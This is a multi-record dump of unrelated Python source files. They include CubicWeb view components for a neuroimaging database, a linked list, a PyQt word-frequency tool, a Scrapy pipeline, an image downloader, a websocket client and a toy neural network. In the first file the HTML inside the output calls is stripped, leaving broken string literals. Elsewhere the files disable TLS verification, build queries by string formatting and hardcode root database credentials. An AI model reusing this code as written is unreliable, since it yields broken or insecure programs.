')\n\n # ProcessingRun\n rql = \"Any P Where P is ProcessingRun\"\n if study is not None:\n rql += \", P study ST, ST name '{0}'\".format(study)\n # > disable QC buttons\n if self.auto_disable_qc:\n rql_scores = (\"DISTINCT Any T \" + rql[5:] +\n \", P type T, P score_values V\")\n rset = self._cw.execute(rql_scores)\n active_types = set(row[0] for row in rset)\n # > build navigation\n href = self._cw.build_url(rql=rql)\n rql_types = \"DISTINCT Any T ORDERBY T \" + rql[5:] + \", P type T\"\n rset = self._cw.execute(rql_types)\n types = [line[0] for line in rset.rows]\n if len(types) > 0:\n # > main button\n w(u'')\n # > typed buttons container\n w(u'
'.format(study))\n w(u'
')\n w(u'
')\n # > typed buttons\n for ptype in types:\n typed_rql = rql + \", P type '{0}'\".format(ptype)\n href = self._cw.build_url(rql=typed_rql)\n w(u'
')\n w(u'
')\n w(u''.format(href))\n w(u'{0}'.format(ptype))\n href = self._cw.build_url(\n \"view\", vid=\"score-value-table-secondary\", study=study or \"\",\n etype=\"ProcessingRun\", rtype=ptype, pname=\"parameters\",\n rsubject=\"subjects\", title=\"QC Scores\",\n elts_to_sort=[\"ID\"], tooltip_name=\"QC\")\n btn_status = \"active\"\n if self.auto_disable_qc and ptype not in active_types:\n btn_status = \"disabled\"\n w(u''.format(btn_status, href))\n w(u'QC')\n w(u'

')\n w(u'
')\n w(u'

')\n\n # GenomicMeasures\n if self.display_genomic:\n w(u'
')\n w(u'
')\n rql = \"Any GM Where GM is GenomicMeasure\"\n if study is not None:\n rql += \", GM study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n w(u''.format(href))\n w(u'Genomic measures')\n w(u'

')\n\n # MetaGen\n if self.display_metagen:\n w(u'
')\n w(u'
')\n href = self._cw.build_url(rql=\"Any C Where C is Chromosome\")\n w(u''.format(href))\n w(u'MetaGen (hg38 dbsnp149)')\n w(u'

')\n\n # CWSearch\n w(u'
')\n w(u'
')\n w(u'
')\n href = self._cw.build_url(rql=\"Any S Where S is CWSearch\")\n w(u''.format(href))\n w(u' '\n u'My cart')\n w(u'

')\n\n # History\n if self.display_history:\n w(u'
')\n w(u'
')\n w(u'
')\n href = self._cw.build_url(vid=\"piws-history\")\n w(u''.format(href))\n w(u' '\n u'History')\n w(u'

')\n\n\n###############################################################################\n# Statistic boxes\n###############################################################################\n\nclass PIWSSubjectStatistics(component.CtxComponent):\n \"\"\" Display a box containing links to statistics on the cw entities.\n \"\"\"\n __regid__ = \"subject_statistics\"\n context = \"left\"\n title = _(\"Statistics\")\n order = 1\n __select__ = is_instance(\"Subject\")\n\n def render_body(self, w, **kwargs):\n \"\"\" Method to create the statistic box content.\n \"\"\"\n # Create a view to see the subject gender repartition in the db\n href = self._cw.build_url(\"view\", vid=\"highcharts-basic-pie\",\n rql=\"Any G WHERE S is Subject, S gender G\",\n title=\"Subject genders\")\n w(u'
')\n w(u'

')\n\n # Create a view to see the subject handedness repartition in the db\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-basic-pie\",\n rql=\"Any H WHERE S is Subject, S handedness H\",\n title=\"Subject handednesses\")\n w(u'
')\n\n\nclass PIWSAssessmentStatistics(component.CtxComponent):\n \"\"\" Display a box containing links to statistics on the cw entities.\n \"\"\"\n __regid__ = \"assessment_statistics\"\n context = \"left\"\n title = _(\"Statistics\")\n order = 1\n __select__ = is_instance(\"Assessment\")\n\n def render_body(self, w, **kwargs):\n \"\"\" Method to create the statistic box content.\n \"\"\"\n # Create a view to see the db acquistion status\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE A is Assessment\", title=\"Acquisition status\",\n relations=[\"scans\", \"questionnaire_runs\", \"genomic_measures\"],\n subject_attr=\"timepoint\", object_attr=\"label\")\n w(u'
')\n w(u'

')\n\n # Create a view to see the db processing status\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-relation-summary-view\",\n rql=\"Any A WHERE A is Assessment\", title=\"Processing status\",\n relations=\"processing_runs\", subject_attr=\"timepoint\",\n object_attr=\"label\")\n w(u'
')\n w(u'

')\n\n # Create a view to see the db subject age distribution\n href = self._cw.build_url(\n \"view\", vid=\"highcharts-basic-plot\",\n rql=\"Any A WHERE X is Assessment, X age_of_subject A\",\n title=\"Age distribution\", is_hist=True)\n w(u'
')\n w(u'

')\n\n\nclass PIWSSummary(component.CtxComponent):\n \"\"\" Display a summary table of all the available datasets.\n \"\"\"\n __regid__ = \"stat_box\"\n contextual = True\n context = \"right\"\n title = (\"Database content\")\n order = 0\n __select__ = match_view(\"index\")\n categories = [\"Scan\", \"QuestionnaireRun\", \"ProcessingRun\"]\n nb_types = None\n categories_mapping = {\n \"Timepoint\": \"\",\n \"Scan\": \"Scans\",\n \"QuestionnaireRun\": \"Tables\",\n \"ProcessingRun\": \"Processed data\"}\n rql_subjects = \"Any S WHERE S is Subject, S study ST, ST name '{0}'\"\n\n def render_body(self, w):\n \"\"\" Method to create the summary table for each study.\n \"\"\"\n # Get an admin connection\n with self._cw.session.repo.internal_cnx() as session:\n\n # Go through each study\n studies = [row[0] for row in session.execute(\n \"DISTINCT Any SN ORDERBY SN Where S is Study, S name SN\")]\n for study in studies:\n\n # Display the study name\n w(u\"Study: {0}

\".format(study))\n\n # Get all the subjects attached to the current study\n rql = self.rql_subjects.format(study)\n nb_subjects = session.execute(rql).rowcount\n\n # Create the table\n w(u\"\")\n w(u\"\")\n for header in [\"Timepoint\"] + self.categories:\n w(u\"\".format(self.categories_mapping[header]))\n w(u\"\")\n\n # Go through each timepoint (one row per timepoint in the tab)\n timepoints = [row[0] for row in session.execute(\n (\"DISTINCT Any T ORDERBY T WHERE A is Assessment, \"\n \"A timepoint T, A study ST, ST name '{0}'\".format(study)))]\n for timepoint in timepoints:\n\n # Go through each category (one column per category in\n # the tab)\n w(u\"\")\n w(u\"\".format(timepoint))\n for category in self.categories:\n\n # Deal with questionnaire special case\n if category == \"QuestionnaireRun\":\n type_name = \"label\"\n else:\n type_name = \"type\"\n\n # Compute the fill ratio\n try:\n nb_types = self.nb_types[study][category]\n except:\n rql = (\"DISTINCT Any T WHERE X is {0}, X {1} T, \"\n \"X study ST, ST name '{2}'\".format(\n category, type_name, study))\n nb_types = session.execute(rql).rowcount\n rql = (\n \"Any X WHERE X is {0}, X study ST, ST name \"\n \"'{1}', X in_assessment A, A timepoint \"\n \"'{2}'\".format(category, study, timepoint))\n nb_items = session.execute(rql).rowcount\n ratio = 0.\n if nb_types != 0 and nb_subjects != 0:\n ratio = (float(nb_items) /\n float(nb_types * nb_subjects))\n\n # Display the fill ratio\n w(u\"\")\n\n w(u\"\")\n\n w(u\"
{0}
{0}\")\n w(u\"\"\n \"\".format(ratio * 100.))\n w(u\"
\")\n\n\n###############################################################################\n# Image viewers\n###############################################################################\n\nAUTHORIZED_IMAGE_EXT = [\".nii\", \".nii.gz\"]\n\n\nclass PIWSImageViewers(component.CtxComponent):\n \"\"\" Display a box containing links to image viewers.\n \"\"\"\n __regid__ = \"image_viewers\"\n context = \"left\"\n title = _(\"Image viewers\")\n order = 1\n __select__ = is_instance(\"Scan\") & one_line_rset\n\n def render_body(self, w, **kwargs):\n \"\"\" Method to create the image box content.\n \"\"\"\n # 3D image viewer\n scan = self.cw_rset.get_entity(0, 0)\n if len(scan.filesets) > 0:\n efentries = scan.filesets[0].external_files\n else:\n efentries = []\n imagefiles = [e.filepath for e in efentries\n if e.filepath.endswith(tuple(AUTHORIZED_IMAGE_EXT))]\n limagefiles = len(imagefiles)\n if limagefiles > 0:\n w(u'
')\n w(u'
')\n href = self._cw.build_url(\n \"view\", vid=\"brainbrowser-image-viewer\", imagefiles=imagefiles,\n __message=(u\"Found '{0}' image(s) that can be \"\n \"displayed.\".format(limagefiles)))\n w(u''.format(\n href))\n w(u'Triplanar')\n w(u'

')\n\n\n###############################################################################\n# Add a box to display entity relations\n###############################################################################\n\nclass RelationBox(component.CtxComponent):\n \"\"\" Helper view class to display a relation rset in a sidebox.\n \"\"\"\n __select__ = nonempty_rset() & match_kwargs(\"title\", \"rql\")\n __regid__ = \"relationbox\"\n cw_property_defs = {}\n context = \"incontext\"\n\n @property\n def domid(self):\n return (super(RelationBox, self).domid + unicode(abs(id(self))) +\n unicode(abs(id(self.cw_rset))))\n\n def render_title(self, w):\n w(self.cw_extra_kwargs[\"title\"])\n\n def render_body(self, w):\n defaultlimit = self._cw.property_value(\"navigation.related-limit\")\n if not isinstance(self.cw_rset, list):\n rset = list(self.cw_rset.entities())\n else:\n rset = self.cw_rset\n for entity in rset[:(defaultlimit - 1)]:\n w(u\"
• \" + entity.view(self.context) + u\"
\")\n # if len(rset) == defaultlimit:\n rql = self.cw_extra_kwargs[\"rql\"]\n href = self._cw.build_url(rql=rql)\n w(u\"
\".format(href))\n\n\n###############################################################################\n# Change logo\n###############################################################################\n\n@monkeypatch(ApplLogo)\ndef render(self, w):\n w(u'' % (\n self._cw.base_url(),\n self._cw.data_url(self._cw.vreg.config.get(\"logo\"))))\n\n\n###############################################################################\n# Change footer\n###############################################################################\n\nclass FooterView(EntityView):\n \"\"\" Footer content when an entity is displayed\"\"\"\n __regid__ = \"metadata\"\n show_eid = True\n\n def cell_call(self, row, col):\n _ = self._cw._\n entity = self.cw_rset.get_entity(row, col)\n self.w(u\"

\")\n if self.show_eid:\n self.w(u\"{0} #{1} - \".format(entity.dc_type(), entity.eid))\n if entity.creation_date:\n self.w(u\"created on \")\n self.w(u\"{0}\".format(\n self._cw.format_date(entity.creation_date)))\n self.w(u\"

\")\n\n\n###############################################################################\n# Registry\n###############################################################################\n\ndef registration_callback(vreg):\n vreg.register_and_replace(\n PIWSAuthenticatedUserStatus, BSAuthenticatedUserStatus)\n vreg.register(RelationBox)\n vreg.register(TimeLeft)\n vreg.register(PIWSNavigationtBox)\n vreg.register(PIWSSubjectStatistics)\n vreg.register(PIWSAssessmentStatistics)\n vreg.register(PIWSImageViewers)\n vreg.register(PIWSSummary)\n vreg.unregister(EditBox)\n vreg.unregister(BreadCrumbEntityVComponent)\n vreg.unregister(BreadCrumbAnyRSetVComponent)\n vreg.unregister(BreadCrumbETypeVComponent)\n vreg.unregister(BreadCrumbLinkToVComponent)\n vreg.unregister(AnonUserStatusLink)\n vreg.register_and_replace(FooterView, MetaDataView)\n config = load_forms(vreg.config)\n if not isinstance(config, dict):\n vreg.unregister(CWUploadBox)\n","repo_name":"neurospin/piws","sub_path":"piws/views/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":29016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71514808584","text":"class SLnode:\n def __init__(self, val) -> None:\n self.value = val\n self.next = None\n\nclass SList:\n def __init__(self) -> None:\n self.head = None\n \n def add_to_front(self, val):\n new_node = SLnode(val)\n new_node.next = self.head\n self.head = new_node\n return self\n \n def print_values(self):\n runner = self.head\n while runner != None:\n print(runner.value)\n runner = runner.next\n return self\n\n def add_to_back(self, val):\n if self.head == None:\n self.add_to_front(val)\n return self\n new_node = SLnode(val)\n runner = self.head\n while runner.next != None:\n runner = runner.next\n runner.next = new_node\n return self\n\n def remove_from_front(self):\n if self.head == None:\n return self\n self.head = self.head.next\n return self\n \n def remove_from_back(self):\n if self.head == None:\n return self\n runner = self.head\n runner2 = runner.next\n while runner2.next != None:\n runner2 = runner2.next\n runner = runner.next\n runner.next = None\n return self\n\n def remove_val(self, val):\n if self.head.value == val:\n self.remove_from_front()\n return self\n runner = self.head\n runner2 = runner.next\n while runner2.value != val and runner2.next != None:\n runner2 = runner2.next\n runner = runner.next\n if runner2.value == val:\n runner.next = runner2.next\n else:\n print(f\"Value {val} is not in list.\")\n return self\n \n def insert_at(self, val, n):\n if n == 0:\n self.add_to_front(val)\n return self\n new_node = SLnode(val)\n runner = self.head\n runner2 = runner.next\n m = 1\n while runner2.next != None and m != n:\n runner = runner.next\n runner2 = runner2.next\n m += 1\n if m == n:\n runner.next = new_node\n new_node.next = runner2\n elif m < n:\n runner2.next = new_node\n return self\n\n\n\nmy_list = SList()\nmy_list.add_to_front(2).add_to_front(1).add_to_back(3).print_values() \n# my_list.remove_from_front().print_values() \n# my_list.remove_from_back().print_values() \n# my_list.remove_val(12).print_values()\nmy_list.insert_at(20,3).print_values()","repo_name":"zhanliu324/Coding-Dojo","sub_path":"2.python/fundamentals/extras/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27859449948","text":"import csv\nimport 
requests\nfrom PyQt5 import QtCore, QtWidgets\nfrom gui import Ui_Form\nimport os\nimport globals\nimport textract\nfrom urllib.parse import urlparse\nimport MeCab\nfrom collections import Counter\nfrom nltk import word_tokenize\nimport re\n\nhome = os.path.dirname(__file__)\n\nclass Worker(QtWidgets.QDialog):\n\n def __init__(self, files, *args):\n super().__init__()\n self.files = files\n self.resize(345, 70)\n self.progressBar = QtWidgets.QProgressBar(self)\n self.progressBar.setGeometry(QtCore.QRect(10, 20, 321, 23))\n self.progressBar.setWindowTitle(\"Adding...\")\n self.progressBar.setMinimum(0)\n self.progressBar.setMaximum(0)\n\n self.freqthread = Files(self.files, *args)\n self.freqthread.start()\n self.freqthread.done.connect(lambda: self.close())\n\n self.show()\n\nclass Files(QtCore.QThread):\n done = QtCore.pyqtSignal(bool)\n\n def __init__(self, files, out, type, addoccur):\n super().__init__()\n self.files = files\n self.words = []\n self.type = type\n self.out = out\n self.addoccur = addoccur\n\n def run(self):\n for file in self.files:\n self.words += file.tokenize()\n self.gen_freq()\n self.done.emit(True)\n\n def gen_freq(self):\n freqTitle = os.path.basename(self.files[0].filepath)[\n :-4] + \"_Frequency_List\" + self.type\n counter = Counter(self.words)\n trashre = re.compile(\n r\"^['\\\"{}!(:/.\\\\0-9%^&*@#$_\\-~`|+•『』〔〕��]\\[\\]{}⦅⦆〈〉。、>< ,・=;※ー【】〖〗〘〙)a-zA-Z]{0,2}$\")\n mc = counter.most_common()\n mc = {k: v for k, v in mc if not bool(re.findall(trashre, k))}\n freqinfo = [k for k, _ in mc.items()]\n with open(os.path.join(self.out, freqTitle), \"w\", encoding=\"utf8\") as freq:\n if self.type == \".csv\":\n obj = csv.writer(freq)\n for _, row in enumerate(freqinfo):\n if self.addoccur:\n obj.writerow([row, counter[row]])\n else:\n obj.writerow([row, \"\"])\n else:\n if self.addoccur:\n freq.write('\\n'.join(['\\t'.join([k, str(v)])\n for k, v in counter.most_common()]))\n else:\n freq.write('\\n'.join(freqinfo))\n\n\nclass File(QtCore.QThread):\n\n def __init__(self, filepath, lang):\n super().__init__()\n self.filepath = filepath\n self.lang = lang\n self.isweb = self.check_web()\n\n if self.lang == \"japanese\":\n self.wakati = MeCab.Tagger(\"-Owakati\")\n\n def extract_text(self):\n if self.isweb:\n with open(os.path.join(home, \"temp.html\"), \"wb\") as f:\n f.write(requests.get(self.filepath).content)\n self.filepath = os.path.join(home, \"temp.html\")\n\n text = textract.process(self.filepath, encoding=\"utf-8\")\n if self.isweb:\n os.remove(os.path.join(home, \"temp.html\"))\n return text.decode('utf-8')\n\n def check_web(self):\n try:\n _ = requests.get(self.filepath)\n except:\n return False\n else:\n return True\n\n def tokenize(self):\n if self.lang != \"japanese\":\n tokenized = word_tokenize(self.extract_text())\n else:\n tokenized = self.wakati.parse(self.extract_text()).split()\n return tokenized\n\n\nclass MainWindow(Ui_Form):\n\n def __init__(self):\n super().__init__()\n\n def setupUi(self):\n self.choosedirbutton.clicked.connect(self.choosedir)\n self.generate.clicked.connect(\n lambda: self.genfreq(self.filetype.currentText()))\n self.remove.clicked.connect(self.deleteItem)\n self.clear.clicked.connect(self.clearList)\n self.lang.addItems(globals.supportedlangs)\n\n def choosedir(self):\n self.dir = str(QtWidgets.QFileDialog.getExistingDirectory(\n self, \"Output Folder\"))\n self.outpath.setText(self.dir)\n\n def genfreq(self, filetype):\n files = [str(self.filewidget.item(i).text())\n for i in range(self.filewidget.count())] + 
[self.url.text()]\n if len(files) == 1 and not files[0]:\n self.error(\"No files have been selected\")\n return\n if not os.path.exists(self.outpath.text()):\n self.error(\"Choose an output directory first\")\n return\n\n files = [File(filename, self.lang.currentText())\n for filename in files if filename]\n worker = Worker(files, self.dir, filetype.currentText(), self.addoccur.isChecked())\n\n def error(self, text, title=\"Error has occured\"):\n dialog = QtWidgets.QMessageBox()\n dialog.setWindowTitle(title)\n dialog.setText(text)\n dialog.setIcon(QtWidgets.QMessageBox.Warning)\n dialog.exec_()\n\n def deleteItem(self):\n listItems = self.filewidget.selectedItems()\n if not listItems:\n self.filewidget.setCurrentItem(self.filewidget.item(0))\n if self.filewidget.count() > 0:\n self.deleteItem()\n\n for item in listItems:\n self.filewidget.takeItem(self.filewidget.row(item))\n\n def clearList(self):\n self.filewidget.setCurrentItem(self.filewidget.item(0))\n for _ in range(self.filewidget.count()):\n self.filewidget.clear()\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n screen = MainWindow()\n screen.setupUi()\n screen.show()\n sys.exit(app.exec_())\n","repo_name":"kamui-fin/freq-gen","sub_path":"src/freq.py","file_name":"freq.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1787711538","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom xiaoshuo.items import XiaoshuoJobItem\nfrom pymongo import MongoClient\nimport pymysql\nclass MuluPipeline(object):\n def process_item(self, item, spider):\n print(item,'+++++++++++++')\n return item\n\nclass XiaoSqlPipeline(object):\n def open_spider(self,spider):\n '''\n 爬虫启动时出发该函数,spider为触发pipeline的爬虫实例\n '''\n self.__conn = pymysql.connect(\n host='127.0.0.1',\n port=3306,\n db='xiaoshuo1',\n user='root',\n passwd='root',\n charset='utf8')\n self.cu=self.__conn.cursor(pymysql.cursors.DictCursor)\n\n # self.m=MongoClient()#连接数据库\n # self.db=self.m.xiaoshuo#进入数据库\n # self.col=self.db[spider.name]#获取数据库\n def process_item(self,item,spider):\n '''\n 当爬虫刨除一个item实例是触发该函数向该方法传入触发的item实例及爬虫实例\n '''\n #当传入的item为XiaoshuoJobItem类型时将其转换为字典存入MongoDB\n # if isinstance(item,XiaoshuoJobItem):\n # self.col.insert_one(dict(item))\n # #将item返回以带后继的pipeline进行处理\n # return item\n if isinstance(item, XiaoshuoJobItem):\n #查询分类\n sql = 'select * from book where name=%s'\n flag = self.cu.execute(sql,(item['name'],))\n if flag:\n tid=self.cu.fetchone()\n else:\n sql='insert into book(name,cation,size,progress,upload,update,image_urls)values(%s,%s,%s,%s,%s,%s,%s)'\n self.cu.execute(sql,(item['name'],item['cation'],item['size'],item['progress'],item['upload'],item['update'],item['image_urls']))\n self.__conn.commit()\n tid=self.cu.lastrowid\n return item\n\ndef close_spider(self,spider):\n '''\n 当爬虫关闭时触发该方法,一般可以用来数据库的断开操作\n '''\n self.m.close()\n","repo_name":"xuruigang/spiderproject","sub_path":"spiderproject/xiaoshuo/build/lib/xiaoshuo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17645379777","text":"# @, %, #을 사용한다. 
@는 3을 곱하고, %는 5를 더하며, #는 7을 빼는 연산자\n# 3\n# 3 @ %\n# 10.4 # % @\n# 8 #\n\nt = int(input())\n\nans = list()\n\nfor i in range(t) :\n li = list(input().split())\n num = float(li.pop(0))\n\n for j in range(len(li)): \n if li[j] == '@' :\n num *= 3\n elif li[j] == '%':\n num += 5\n elif li[j] == '#':\n num -= 7\n\n ans.append(\"{:0.2f}\".format(num))\n\nfor i in range(len(ans)):\n print(ans[i])\n\n \n \n\n ","repo_name":"Techeer-3rd-gen-study/Algorithm-study","sub_path":"01주차_10.7_10.12/3_5355/정길연_5355.py","file_name":"정길연_5355.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"16157062024","text":"\"\"\"\nCSE101: Introduction to Programming\nAssignment 3\n\nName :Vaibhav Gupta\nRoll-no :2019341\n\"\"\"\n\n\n\nimport math as m\nimport random\n\n\n\ndef dist(p1, p2):\n \"\"\"\n Find the euclidean distance between two 2-D points\n\n Args:\n p1: (p1_x, p1_y)\n p2: (p2_x, p2_y)\n \n Returns:\n Euclidean distance between p1 and p2\n \"\"\"\n return m.sqrt(m.pow(p1[0] - p2[0],2) + m.pow(p1[1] - p2[1],2))\n\n\n\ndef sort_points_by_X(points):\n \"\"\"\n Sort a list of points by their X coordinate\n\n Args:\n points: List of points [(p1_x, p1_y), (p2_x, p2_y), ...]\n \n Returns:\n List of points sorted by X coordinate\n \"\"\"\n return sorted(points,key=lambda x:x[0])\n\n\n\ndef sort_points_by_Y(points):\n \"\"\"\n Sort a list of points by their Y coordinate\n\n Args:\n points: List of points [(p1_x, p1_y), (p2_x, p2_y), ...]\n \n Returns:\n List of points sorted by Y coordinate \n \"\"\"\n return sorted(points,key=lambda x:x[1])\n\n\n\ndef naive_closest_pair(plane):\n \"\"\"\n Find the closest pair of points in the plane using the brute\n force approach\n\n Args:\n plane: List of points [(p1_x, p1_y), (p2_x, p2_y), ...]\n\n Returns:\n Distance between closest pair of points and closest pair \n of points: [dist_bw_p1_p2, (p1_x, p1_y), (p2_x, p2_y)]\n \"\"\"\n l=[]\n\n for i in range(len(plane)-1):\n for j in range(i+1,len(plane)):\n l.append([dist(plane[i],plane[j]),plane[i],plane[j]])\n\n a=sorted(l,key=lambda x:x[0])\n\n return a[0]\n\n\n\ndef closest_pair_in_strip(points, d):\n \"\"\"\n Find the closest pair of points in the given strip with a \n given upper bound. This function is called by \n efficient_closest_pair_routine\n\n Args:\n points: List of points in the strip of interest.\n d: Minimum distance already found found by \n efficient_closest_pair_routine\n\n Returns:\n Distance between closest pair of points and closest pair \n of points: [dist_bw_p1_p2, (p1_x, p1_y), (p2_x, p2_y)] if\n distance between p1 and p2 is less than d. Otherwise\n return -1.\n \"\"\"\n if len(points)>=2:\n\n s=[]\n p=sort_points_by_Y(points)\n\n for i in range(len(p)-1):\n for j in range(i+1,len(p)):\n s.append([dist(p[i],p[j]),p[i],p[j]])\n\n a = sorted(s, key=lambda x: x[0])\n\n if a[0][0] 1:\n # file = tokens[1]\n # else:\n # file = 'null'\n # print(tokens[4], tokens[5])\n # print(folder, file)\n return 'images/' + folder + '.' 
+ file\n\n\ndef make_folder(folder):\n if not os.path.exists(folder):\n os.mkdir(folder)\n return\n\ndef process_url(url):\n file = parse_url(url).lower()\n if file[-1] == '.':\n file = file + 'jpg'\n\n # make_folder(folder)\n\n if not os.path.isfile(file):\n with open(file, 'wb') as f:\n resp = requests.get(url, verify=False)\n f.write(resp.content)\n f.close()\n\nwith open('birds-to-words-v1.0.tsv') as tsvfile:\n reader = csv.reader(tsvfile, delimiter='\\t')\n # i = 0\n data = []\n for i, row in enumerate(reader):\n # i += 1\n if i == 0:\n continue\n process_url(row[1])\n process_url(row[5])\n # print(i)\n # if i == 10:\n # break\n","repo_name":"XiaoxiaoGuo/fashion-iq","sub_path":"transformer/user_modeling/download_image.py","file_name":"download_image.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"78"} +{"seq_id":"43173455699","text":"'''\nCreated on Aug 17, 2019\n\n@author: k_sato\n'''\nimport pprint\nimport socket\nimport websocket\nfrom bs4 import BeautifulSoup\nfrom threading import Thread\nimport time\nimport requests\nfrom utils.logger import Logger\n# import sys\n\nclass WsClient:\n # 初期化\n def __init__(self, server_info):\n self.logger = Logger()\n self.logger.log(['WsClient', 'init', 'START'])\n # 接続先情報受け取り\n self.server_info = server_info\n # 通常ソケットの生成\n self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # セッション生成\n self.session = requests.session()\n\n def start_chat(self):\n print(\"WsClient.start_chat\")\n self.logger.log(['WsClient', 'start_chat', 'START'])\n # Websocket用意\n ws_url = \"ws://\" + self.server_info['server_name'] + \":\" + str(self.server_info['ws_port']) + self.server_info['websocket_path']\n self.logger.log(['WsClient', 'start_chat', 'ws_url' + ws_url])\n self.ws = websocket.WebSocketApp(ws_url,\n on_message=self.on_message,\n on_error=self.on_error,\n on_close=self.on_close)\n # 通信ポーリング\n self.ws.on_open = self.on_open\n self.ws.run_forever()\n self.logger.log(['WsClient', 'start_chat', 'End'])\n\n # メッセージ受信\n def on_message(self, message):\n self.logger.log(['WsClient', 'on_message', 'START'])\n print(self.ws)\n print(message)\n\n \"\"\"\n エラーハンドリング\n @param error\n @return: none\n \"\"\"\n def on_error(self, error):\n self.logger.log(['WsClient', 'on_error', 'START'])\n print(\"WsClient.on_error\")\n print(self.ws)\n print(error)\n\n \"\"\"\n Websocketのクローズ\n @param none\n @return: none\n \"\"\"\n def on_close(self):\n print(\"WsClient.on_close\")\n print(self.ws)\n print(\"### closed ###\")\n\n \"\"\"\n 通信ポーリング\n @param none\n @return: none\n \"\"\"\n def on_open(self):\n self.logger.log(['WsClient', 'on_open', 'START'])\n print(\"Thread call run\")\n Thread(target=self.run).start()\n\n \"\"\"\n クライアント\n @param none\n @return: none\n \"\"\"\n def run(self):\n self.logger.log(['WsClient', 'run', 'START'])\n print(self.ws)\n for i in range(3):\n print(\"ws send...\")\n self.ws.send(\"Hello %d\" % i)\n print(\"Hello %d\" % i)\n print(\"time sleep...\")\n time.sleep(1)\n\n time.sleep(1)\n self.ws.close()\n self.logger.log(['WsClient', 'run', 'Thread terminating...'])\n\n \"\"\"\n 認証処理\n @param none\n @return: none\n \"\"\"\n def auth_user(self):\n self.logger.log(['WsClient', 'auth_user', 'START'])\n url = self.server_info['protcol'] + '://' + self.server_info['server_name'] + self.server_info['sign_in_url']\n self.logger.log(['WsClient', 'auth_user', 'sign_in_url' + url])\n try:\n response = self.session.get(url)\n self.logger.log(['WsClient', 
'run', 'status_code:' + str(response.status_code)])\n # BeautifulSoupオブジェクト作成(token取得の為)\n bs = BeautifulSoup(response.text, 'html.parser')\n login_data = {\n 'UTF-8': '✓',\n 'email': self.server_info['user_name'],\n 'password': self.server_info['password'],\n }\n\n # tokenの取得\n self.authenticity_token = bs.find(attrs={'name':'authenticity_token'}).get('value')\n\n # 取得したtokenをpostするパラメータに追加\n login_data['authenticity_token'] = self.authenticity_token\n\n # ログインAPI実行\n url = self.server_info['protcol'] + '://' + self.server_info['server_name'] + self.server_info['api_sign_in_url']\n self.logger.log(['WsClient', 'auth_user', 'api_sign_in_url' + url])\n\n # 実行結果\n self.login_data = self.session.post(url, data=login_data)\n self.logger.log(['WsClient', 'auth_user', 'sign_in_url' + url])\n self.logger.log(['WsClient', 'auth_user', \"----WsClient.auth_user session----\"])\n self.logger.log(['WsClient', 'auth_user', \"server_name:\"+self.server_info['server_name'] ,'session:' + str(pprint.pprint(self.session))])\n self.status = 'able'\n except requests.exceptions.RequestException:\n self.status = 'eable'\n def get_lounges(self):\n self.logger.log(['WsClient', 'get_lounges', \"START\"])\n url = self.server_info['protcol'] + '://' + self.server_info['server_name'] + self.server_info['lounges'] + \".json\"\n self.logger.log(['WsClient', 'get_lounges', \"url\"+url])\n try:\n response = self.session.get(url)\n self.logger.log(['WsClient', 'get_lounges', 'sign_in_url' + url])\n self.logger.log(['WsClient', 'get_lounges', \"response.text\"+response.text])\n return response\n except requests.exceptions.RequestException:\n self.logger.log(['WsClient', 'get_lounges', 'Can not get lounges' ])\n\n def remark(self, content, lounge_id):\n self.logger.log(['WsClient', 'remark', 'Start' ])\n subscribre_data = {\n 'UTF-8': '✓',\n 'user_id': self.login_data['user_id'],\n 'lounge_id': lounge_id,\n 'content': content,\n 'last_posted_at': self.login_data['last_posted_at'],\n 'authenticity_token': self.authenticity_token\n }\n ws_url = \"ws://\" + self.server_info['server_name'] + \":\" + str(self.server_info['ws_port']) + self.server_info['websocket_path']\n self.data = self.session.post(ws_url, data=subscribre_data)\n self.logger.log(['WsClient', 'remark', 'data geted' ])\n self.logger.log(['WsClient', 'remark', 'data' + self.data ])\n\n\n\n","repo_name":"satokadumasa/BambooClientPy","sub_path":"net/wsclient.py","file_name":"wsclient.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25532527166","text":"import numpy as np\nimport sklearn.datasets\nfrom matplotlib import pyplot as plt\n\n\nX, y = sklearn.datasets.make_moons(200, noise=0.2)\n\nfig = plt.figure()\nax = fig.gca()\nax.scatter(X[:,0], X[:,1], s=40, c=y, cmap=plt.cm.Spectral)\nax.set_xticks([])\nax.set_yticks([])\nplt.savefig('data_scatter.png')\n\nnn_hdim = 3\nnum_examples = len(X)\nnn_input_dim = 2\nnn_output_dim = 2\nnn_nlayer = 1\n\ndef softmax(xlist):\n \"\"\"\n \"\"\"\n\n res = [np.exp(x) for x in xlist]\n\n res /= np.sum(res,axis=1, keepdims=True)\n return res\n\n \ndef calculateLoss(model):\n \"\"\"\n \"\"\"\n\n W1 = model[0]\n b1 = model[1]\n W2 = model[2]\n b2 = model[3] \n\n\n z1 = X.dot(W1) + b1\n a1 = np.tanh(z1)\n z2 = a1.dot(W2) + b2\n a2 = softmax(z2)\n\n\n # print('z1.shape = %s' %(z1.shape,))\n # print('a1.shape = %s' %(a1.shape,))\n\n correct_logprobs = 